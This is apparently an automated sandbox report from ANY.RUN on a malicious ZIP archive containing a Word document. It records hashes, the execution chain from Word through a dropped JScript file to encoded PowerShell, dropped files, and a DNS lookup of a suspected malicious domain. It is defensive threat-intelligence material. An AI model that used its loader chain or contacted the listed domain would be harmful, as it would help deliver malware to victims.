File name: Sodimec.zip
Full analysis: https://app.any.run/tasks/7cacc60d-0d21-4fac-9a2d-3a6e9a188ae1
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 09, 2019, 13:49:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: loader, malscr-1
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: EC232C3747B8CF7E1C463ED6BB08C36C
SHA1: A14FA5736E3BD1E38A6442D305FA0D45DDC414B5
SHA256: 2AD563C56C7D800E44C2EB21B9E52B7A6C1EC25B49DF5D41CA80A892218424F2
SSDEEP: 1536:xiI1Tqz6cMN3tWboUEEgU/0wnldkO/qz3v:xOOH40UNB/0AldkOy7v

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Drops known JS loader
      • WINWORD.EXE (PID: 3204)
    • Executes scripts
      • WINWORD.EXE (PID: 3204)
    • Unusual execution from Microsoft Office
      • WINWORD.EXE (PID: 3204)
  • SUSPICIOUS
    • Starts Microsoft Office Application
      • WinRAR.exe (PID: 2828)
    • Creates files in the Windows directory
      • WINWORD.EXE (PID: 3204)
      • powershell.exe (PID: 2128)
    • Executes PowerShell scripts
      • WScript.exe (PID: 2092)
    • Creates files in the user directory
      • powershell.exe (PID: 2128)
    • Removes files from Windows directory
      • powershell.exe (PID: 2128)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 3204)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 3204)
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: info_09_24.doc
ZipUncompressedSize: 89088
ZipCompressedSize: 50338
ZipCRC: 0x4cf7dee8
ZipModifyDate: 2019:09:24 00:11:06
ZipCompression: Deflated
ZipBitFlag: 0x0009
ZipRequiredVersion: 20
No data.
Total processes: 37
Monitored processes: 4
Malicious processes: 2
Suspicious processes: 0

Behavior graph

Process chain (from the graph): winrar.exe → winword.exe → wscript.exe → powershell.exe

Process information

PID: 2828
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sodimec.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Version: 5.60.0

PID: 3204
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb2828.48393\info_09_24.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: WinRAR.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2092
CMD: "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\snykmyaeci.js"
Path: C:\Windows\System32\WScript.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft ® Windows Based Script Host
Version: 5.8.7600.16385

PID: 2128
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -En … (encoded command not preserved in this copy of the report)
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WScript.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 1 960
Read events: 1 459
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 0
Suspicious files: 3
Text files: 1
Unknown types: 3

Dropped files

PID: 3204 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Local\Temp\CVRAD04.tmp.cvr | Type: (not recorded)
MD5: (not recorded)
SHA256: (not recorded)

PID: 2128 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EMPNPTNLXLPIT8OLNYK7.temp | Type: (not recorded)
MD5: (not recorded)
SHA256: (not recorded)

PID: 2128 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | Type: binary
MD5: A272B20D1454EFE23A324E582F0E701D
SHA256: 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051

PID: 2128 | Process: powershell.exe | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF18b783.TMP | Type: binary
MD5: A272B20D1454EFE23A324E582F0E701D
SHA256: 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051

PID: 2828 | Process: WinRAR.exe | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DIb2828.48393\info_09_24.doc | Type: document
MD5: 3736E814E1011B02B2574C177580AF6B
SHA256: BA73EE6C242906B6A33E41CCBFC4A879BCAAC5EA6B0810BDF01F6283FBF6C5FE

PID: 3204 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Local\Temp\Rar$DIb2828.48393\~$fo_09_24.doc | Type: pgc
MD5: C7B643BB0008D86741C210F88A058851
SHA256: A110116B3D8C24B41D236CE717D4320FEA648BBFD8EEE80A3E3662A2087D1E34

PID: 3204 | Process: WINWORD.EXE | Filename: C:\Windows\Temp\snykmyaeci.js | Type: text
MD5: E58C8A410079599A0B005C329C76CA4C
SHA256: 709A93CEBA56B209CC55918B17886B22C79E4C250039D0C40D806646698529E1

PID: 3204 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | Type: tlb
MD5: 747B91F182BBFD43D80201147D2DFE77
SHA256: 7372C75DD1948322EB7193CCD4290842D3372BE3426836E9123560D9B96A4706

PID: 3204 | Process: WINWORD.EXE | Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | Type: pgc
MD5: B6A518314235DFA84DB2AB642EA21027
SHA256: B67398B70B750FD6B48FF4B87F2B7AB8EE96A3521A87B74A8952C3CB1B4CBFE6
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 1
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: gimentpook.com | IP: (not resolved) | Reputation: unknown

Threats

No threats detected
No debug info